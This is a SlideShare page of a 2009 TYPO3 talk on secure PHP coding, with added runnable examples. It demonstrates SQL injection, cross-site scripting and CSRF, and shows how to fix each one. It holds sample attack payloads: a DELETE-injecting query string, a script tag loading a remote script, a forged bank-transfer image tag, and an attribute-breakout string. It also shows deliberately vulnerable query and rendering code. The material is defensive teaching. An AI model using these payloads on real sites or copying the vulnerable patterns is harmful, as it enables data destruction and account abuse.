Writing secure code
     by Dmitry Dulepov
Security is the issue
You are responsible
You must not fail
Write secure code now!
3 attacks
SQL injection: how

index.php?id=1

"SELECT * FROM pages WHERE " .
"id='" . $_GET['id'] . "'"

index.php?id=1';DELETE FROM be_users'

The quote in the parameter closes the string literal, so the query becomes:

SELECT * FROM pages WHERE id='1';DELETE FROM be_users''
SQL injection: the fix

Quote and escape the value (fullQuoteStr() adds the quotes and escapes the content):

"SELECT * FROM pages WHERE " .
"id=" . $GLOBALS['TYPO3_DB']->fullQuoteStr($id, 'pages')

Or, for an integer column, cast it:

"SELECT * FROM pages WHERE " .
"id=" . intval($id)
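The two slides above side by side in runnable form. This is an added example, not code from the talk: it builds the vulnerable query and the two fixes as plain PHP against an in-memory SQLite database (assumption: the pdo_sqlite extension is available), using PDO::quote() in place of TYPO3's fullQuoteStr() and adding a prepared statement as the third option. The table, its rows and the payloads are constructed test data. Whether the slide's stacked DELETE actually executes depends on the driver (mysql_query() refuses multiple statements, mysqli_multi_query() does not), so the run uses a tautology payload that works everywhere.

```php
<?php
// Added example (not from the slides): the concatenated query from
// "SQL injection: how" next to the fixes from "SQL injection: the fix".
// Assumption: pdo_sqlite is installed. All data below is constructed.

declare(strict_types=1);

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, hidden INTEGER)');
$db->exec("INSERT INTO pages VALUES (1, 'Home', 0), (2, 'Internal draft', 1), (3, 'Contact', 0)");

// Vulnerable: the slide's concatenation, $id taken straight from the URL.
function vulnerableQuery(string $id): string
{
    return "SELECT * FROM pages WHERE " .
           "id='" . $id . "'";
}

// Fix 1: quote and escape. PDO::quote() stands in for fullQuoteStr() here.
function quotedQuery(PDO $db, string $id): string
{
    return "SELECT * FROM pages WHERE " .
           "id=" . $db->quote($id);
}

// Fix 2: for a numeric column, cast. Anything after the leading digits is dropped.
function intQuery(string $id): string
{
    return "SELECT * FROM pages WHERE " .
           "id=" . intval($id);
}

// Fix 3 (preferred outside TYPO3's own API): a prepared statement,
// so the value never becomes part of the SQL text at all.
function preparedRows(PDO $db, string $id): array
{
    $stmt = $db->prepare('SELECT * FROM pages WHERE id = :id');
    $stmt->execute([':id' => $id]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

function rowsFor(PDO $db, string $sql): array
{
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// The slide's payload: print what the concatenated SQL turns into.
$slidePayload = "1';DELETE FROM be_users'";
echo vulnerableQuery($slidePayload), "\n";

// A payload that needs no stacked queries: make the WHERE clause always true.
// The vulnerable query then returns every row of the table; the quoted and
// prepared versions compare id against the whole string and match nothing;
// the intval() version only ever looks up id 1.
$orPayload = "1' OR '1'='1";
printf("vulnerable : %d rows\n", count(rowsFor($db, vulnerableQuery($orPayload))));
printf("quoted     : %d rows\n", count(rowsFor($db, quotedQuery($db, $orPayload))));
printf("intval     : %d rows\n", count(rowsFor($db, intQuery($orPayload))));
printf("prepared   : %d rows\n", count(preparedRows($db, $orPayload)));
```

Run it with `php` from the command line. intval() is only a fix when the column really is an integer; for text columns use the quoting function of the database layer you are on, or better a prepared statement.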
Cross-site scripting: how

A comment form whose text is written back into the page unescaped:

Comment:
I agree!
<script src="http://example.com/evil-script.js"></script>

[Submit]
Cross-site scripting: the fix

Escape the comment at the point where it is inserted into the HTML:

htmlspecialchars($comment)
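The comment slide rendered both ways, as an added example that is not part of the talk. The comment text is the slide's own payload, constructed here as input; the rendering functions and the author string are assumptions made for the demonstration. The point beyond the slide is the flags: pass ENT_QUOTES explicitly (before PHP 8.1 the default left single quotes alone, which is enough to break out of a single-quoted attribute), add ENT_SUBSTITUTE so invalid UTF-8 does not turn the whole string into "", and name the charset. htmlspecialchars() is the right tool for HTML text and quoted attribute values only; inside a script block or a URL a different encoding is needed.

```php
<?php
// Added example (not from the slides): the comment from
// "Cross-site scripting: how" rendered unescaped and escaped.
// The helper names and the author string are assumptions for this demo.

declare(strict_types=1);

// Vulnerable: the comment goes into the page as it was typed.
function renderCommentUnsafe(string $comment): string
{
    return '<p class="comment">' . $comment . '</p>';
}

// The slide's fix with explicit flags:
//   ENT_QUOTES     escape both " and ' (safe inside quoted attributes)
//   ENT_SUBSTITUTE replace invalid UTF-8 instead of returning ""
//   'UTF-8'        must match the page's charset
function escapeHtml(string $text): string
{
    return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function renderCommentSafe(string $comment): string
{
    return '<p class="comment">' . escapeHtml($comment) . '</p>';
}

// The same escaping also covers a quoted attribute value.
function renderAuthor(string $author): string
{
    return '<a title="' . escapeHtml($author) . '">' . escapeHtml($author) . '</a>';
}

// Constructed input: the payload from the slide.
$comment = 'I agree! <script src="http://example.com/evil-script.js"></script>';

// Unescaped: the browser loads and runs evil-script.js for every visitor.
echo renderCommentUnsafe($comment), "\n";

// Escaped: the <script> tag is shown as text and nothing runs.
echo renderCommentSafe($comment), "\n";

// Constructed input: an author name that tries to leave the attribute.
// Without ENT_QUOTES the single quote would pass through untouched.
$author = "x' onmouseover='alert(1)";
echo renderAuthor($author), "\n";
```

The rule the slide compresses into one line is "escape on output, for the context you are outputting into"; escaping on input instead breaks the data for every other use and still misses the other contexts.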
Cross-site request forgery: how

An image tag on any page the victim visits; the browser sends the bank's session cookie along with the request:

<img src="http://yourbank.com/transfer?to_account=DE25LALA1234567890&amount=4000&currency=EUR" />
Cross-site request forgery: the fix

  • $_POST: accept state-changing requests only via POST, never from $_GET
  • random number: a per-session token in a hidden form field, checked on submit
  • Salted magic value
  • Captcha
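The first three items of the fix slide as one small transfer handler. This is an added example, not the talk's code: requests are simulated with plain values so it runs from the command line (the $method, $post and $session parameters stand in for $_SERVER['REQUEST_METHOD'], $_POST and $_SESSION), the session id and the server secret are constructed, and the captcha item is left out. Two caveats the slide does not spell out: POST on its own does not stop CSRF, because an attacker's page can auto-submit a hidden form; what stops it is the token, which the attacker cannot read out of the victim's session. And the "salted magic value" shown here is an HMAC of the session id under a server secret, which needs no server-side storage but is only as strong as the secrecy of that key.

```php
<?php
// Added example (not from the slides): POST-only handling, a random
// per-session token and a salted magic value for the transfer endpoint
// from "Cross-site request forgery: how". All inputs are constructed.

declare(strict_types=1);

// Assumption: a long random secret kept on the server.
const CSRF_SECRET = 'replace-with-a-long-random-server-secret';

// Variant 1: a random token stored in the session and echoed in the form.
function issueSessionToken(array &$session): string
{
    if (!isset($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Variant 2: "salted magic value", an HMAC over the session id; nothing is
// stored, but the secret must stay secret.
function magicValue(string $sessionId): string
{
    return hash_hmac('sha256', $sessionId, CSRF_SECRET);
}

// The form the user sees; both values travel in hidden fields.
function transferForm(array &$session, string $sessionId): string
{
    $token = issueSessionToken($session);
    $magic = magicValue($sessionId);
    return '<form method="post" action="/transfer">'
         . '<input type="hidden" name="csrf_token" value="' . htmlspecialchars($token, ENT_QUOTES) . '">'
         . '<input type="hidden" name="magic" value="' . htmlspecialchars($magic, ENT_QUOTES) . '">'
         . '<input name="to_account"><input name="amount"><input name="currency">'
         . '<button>Transfer</button></form>';
}

// The endpoint. $method, $post and $session play the role of the superglobals.
function handleTransfer(string $method, array $post, array $session, string $sessionId): string
{
    // 1. POST only: an <img src="..."> can only ever issue a GET.
    if ($method !== 'POST') {
        return 'rejected: not a POST request';
    }
    // 2. The token must be the one issued to this session; hash_equals()
    //    compares in constant time so the token does not leak via timing.
    $token = $post['csrf_token'] ?? '';
    if (!isset($session['csrf_token']) || !hash_equals($session['csrf_token'], $token)) {
        return 'rejected: missing or wrong CSRF token';
    }
    // 3. The salted magic value, recomputed from the session id.
    if (!hash_equals(magicValue($sessionId), $post['magic'] ?? '')) {
        return 'rejected: wrong magic value';
    }
    return sprintf('ok: transfer %s %s to %s', $post['amount'], $post['currency'], $post['to_account']);
}

// --- simulation (constructed) ----------------------------------------------
$sessionId = bin2hex(random_bytes(16)); // what the session cookie would carry
$session   = [];                        // server-side session storage

// The slide's attack: the <img> tag makes the browser send a GET with the cookie.
echo handleTransfer('GET', [], $session, $sessionId), "\n";

// An auto-submitted form from the attacker's page gets past the POST check,
// but it cannot carry a token the attacker never saw.
$forged = ['to_account' => 'DE25LALA1234567890', 'amount' => '4000', 'currency' => 'EUR'];
echo handleTransfer('POST', $forged, $session, $sessionId), "\n";

// The legitimate flow: load the form (token issued), then submit it.
$html  = transferForm($session, $sessionId);
$legit = $forged + ['csrf_token' => $session['csrf_token'], 'magic' => magicValue($sessionId)];
echo handleTransfer('POST', $legit, $session, $sessionId), "\n";
```

In a real application the token check belongs in one place that every state-changing action passes through, not in each handler; the captcha from the slide serves the same purpose for actions where a human in the loop is acceptable.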
Remember about security
Make customers happy!
These are the slides from the TYPO3 Developer Days 2009 talk. They show the three most typical security problems in code and how to avoid them.

Published in: Technology
0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
5,703
On SlideShare
0
From Embeds
0
Number of Embeds
519
Actions
Shares
0
Downloads
113
Comments
0
Likes
1
Embeds 0
No embeds

No notes for slide


  • #3413901
  • #5000627


  • #7333775

































